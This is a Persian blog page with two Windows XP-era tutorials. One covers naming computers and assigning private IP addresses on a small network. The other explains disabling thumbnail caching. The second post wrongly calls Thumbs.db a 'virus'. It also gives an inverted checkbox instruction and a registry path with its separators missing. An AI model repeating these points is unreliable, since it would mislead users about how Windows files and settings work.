بعد از نصب سخت افزار های مورد نیاز برای راه اندازی شبکه ، نیاز به نوبت به نصب نرم افزار های آن می رسد.
در اولین قدم باید برای تکتک کامپیوتر های موجود در شبکه خود اسمی منحصر به فرد و غیر تکراری انتخاب کنید .
علاوه بر اسم کامپیوتر اسم گروه کاری یا WORK GROUP هم مهم است . تمام کامپیوتر های یک شبکه باید عضو یک گروه کاری باشند .

ویندوز اکس پی :
برای نام گذاری کامپیوتر در ویندوز اکس پی این مراحل را دنبال کنید :
۱-پنجره control panel را باز کنید
۲-اگر حالت نمایش آیکون ها به صورت کلاسیک نیست روی لینک classic new کلیک کنید .در این حالت بر نامه system را اجرا کنید .
۳-در کادر محاوره ظاهر شده صفحه computer name را انتخاب کنید
۴-همان طور که ملا حظه می کنید کامپیوتر یک اسم کامل دارد و یک گروه کاری . روی دکمه chang کلیک کنید تا کادر محاوره بعدی ظاهر شود .
۵-در کادر اول اسمی را تایپ کنید که می خواهید به کامپیوتر تان اختصاص دهید . این اسم هر چیزی می تواند باشد ، فقط نباید تکراری باشد . مثلا اسم کامپیونر اول را pc 1 بگذارید .
۶-در کادر دوم اسمی را که می خواهید به گروه کاری خود اختصاص دهید وارد کنید .مثلا My office یا My Home یا هر چیز دیگر . حتی خود Work Group هم بد نیست .
۷- در پایان OK و دوباره OK را بزنید . اگر ویندوز خواست ری استارت کند قبول کنید .
ویندوز ۹۸
برای نام گذاری کامپیوتر در ویندوز ۹۸ این مراحل را دنبال کنید:
۱-با کلیک راست روی آیکون Network Neighborhood روی دسکتاپ گزینه ، properties را انتخاب کنید .
۲-در کادر محاوره ظاهر شده ، به صفحه identification بروید .
۳-در کادر اول ، اسم کامپیوتر و در کادر دوم اسم گروه کاری مورد نظر را بنویسید . بعد از تنظیم نام برای تک تک کامپیوتر ها و گذاشتن یک اسم برای کروه کاری تمام آنها ، کامپیوتر ها را دارای هویت کرده و در یک گروه جای داده اید . حالا نوبت به دادن آدرس IP میرسد .

آدرس IP
آدرس IP نشانی هر کامپیوتر در شبکه است . کامپیوتر از طریق این نشانی است که یکدیگر را در شبکه پیدا می کنند .
در هر شبکه آدرس IP هر کامپیوتر باید منحصر به فرد و غیر تکراری باشد .
در باره IP و آدرس دهی از این طریق ، زیاذ میتوان صحبت کرد ، اما از آنجا که در این مقاله قصد پرداختن به تئوری را نداریم بلا فاصله دست به کار می شویم . فقط ذکر این نکته را زروری میدانیم که آدرس IP در واقع یک شماره چهار قسمتی است . هر قسمت عددی از ۰ تا ۲۵۵ است که با علامت نقطه از قسمت بعدی جدا می شود .
مثلا ۱۹۲.۱۶۸.۰.۱ یک آدرس IP است . مفهوم دیگر Subnet Mask است ، که توضیح آن هم از حوصله این مقاله خارج است . فقط این را قبول کنید که در یک شبکه کوچک ، subnet mask را به صورت ۲۵۵.۲۵۵.۲۵۵.۰ تایین می کنیم .
در یک شبکه کوچک ، برای تمام کامپیوتر ها سه قسمت اول آدرس IP را یکسان می گیریم و فقط قسمت چهارم را برای هر کامپیوتر عدد متفاوتی را در نظر می گیریم .
مثلا در کامپیوتر اول آدرس ۱۹۲.۱۶۸.۰.۱ و برای کامپیوتر دوم آدرس ۱۹۲.۱۶۸.۰.۲ را می نویسیم و به همین ترتیب ذر بقیه کامپیوتر ها قسمت چهارم آدرس IP را عدد متفاوتی را می دهیم .

کاظم نجفی بازدید : 2659 چهارشنبه 1390/01/10 نظرات (0)

ویروس Thumbs.db وراه از بین بردن آن


حتمأ شما نیز در محیط ویندوز با فایلهایی با نامThumbs.db که در بسیاری از فولدرها وجود دارد روبرو شده اید. وظیفه این فایلها ذخیره اطلاعات مربوط به حالت نمایشی Thumbnail استو به نوعی یک حافظه موقتجهت ثبت اطلاعات تصاویر Thumbnail تلقی میشود. خاصیت این فایل ها نیز اینگونه است که اگر آنها را به شکل دستی پاک کنید به طور اتوماتیک مجدد در همان محل ساخته میشوند. اما ممکن است شما اصلأ از حالت نمایشمشاهدهTumbnail برای مشاهده تصاویرتان در محیط ویندوز استفاده نکنید یا علاقه ای به وجود این فایلها و پر شدن بی مورد فضای هارد نداشته باشید. در این ترفند قصد داریم به نحوه جلوگیری از ساخت و نهایتأ حذف فایلهایThumbs.db در ویندوز XP بپردازیم


بدین منظور:

My Computer را باز کنید.

از منوی Tools وارد Folder Options شوید.

از تب view رفته و تیك Do not cache thumbnails رابردارید و ok كنید.

اکنون میتوانید به شکل دستی این فایل ها را delet کنید، با این اطمینان که دیگر فایل جدید با عنوان tumbs.db تولید نمیشود.

همچنین شما میتوانید از طریق رجیستری ویندوز نیز اقدام کنید ؛برای اینکار:
از منویstart واردRun شده و عبارت regedit را وارد و Enter تا ویرایشگر رجیستری باز شود.
حال به مسیر زیر بروید:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVe rsion ExplorerAdvanced

از قسمت دیگر پنجره، بر روی DisableThumbnailCache دوباره کلیک کرده و در قسمت Value مقدار آن را به 1 تغییر دهید وok کنید.

اگرDisableThumbnailCache در این محل وجود ندارد، در فضای خالی راست کلیک کرده New > DWORD را انتخاب کنید. نام آن را DisableThumbnailCache

قرار داده و مرحله بالا را اجرا کنید.
در پایان کافی است سیستم را یکبار از نو راه اندازی کنید تا تغییرات اعمال گردد.

تعداد صفحات : 3

اطلاعات کاربری
  • فراموشی رمز عبور؟
  • آرشیو
    آمار سایت
  • کل مطالب : 44
  • کل نظرات : 15
  • افراد آنلاین : 1
  • تعداد اعضا : 4
  • آی پی امروز : 4
  • آی پی دیروز : 2
  • بازدید امروز : 11
  • باردید دیروز : 43
  • گوگل امروز : 0
  • گوگل دیروز : 1
  • بازدید هفته : 58
  • بازدید ماه : 153
  • بازدید سال : 1,029
  • بازدید کلی : 21,736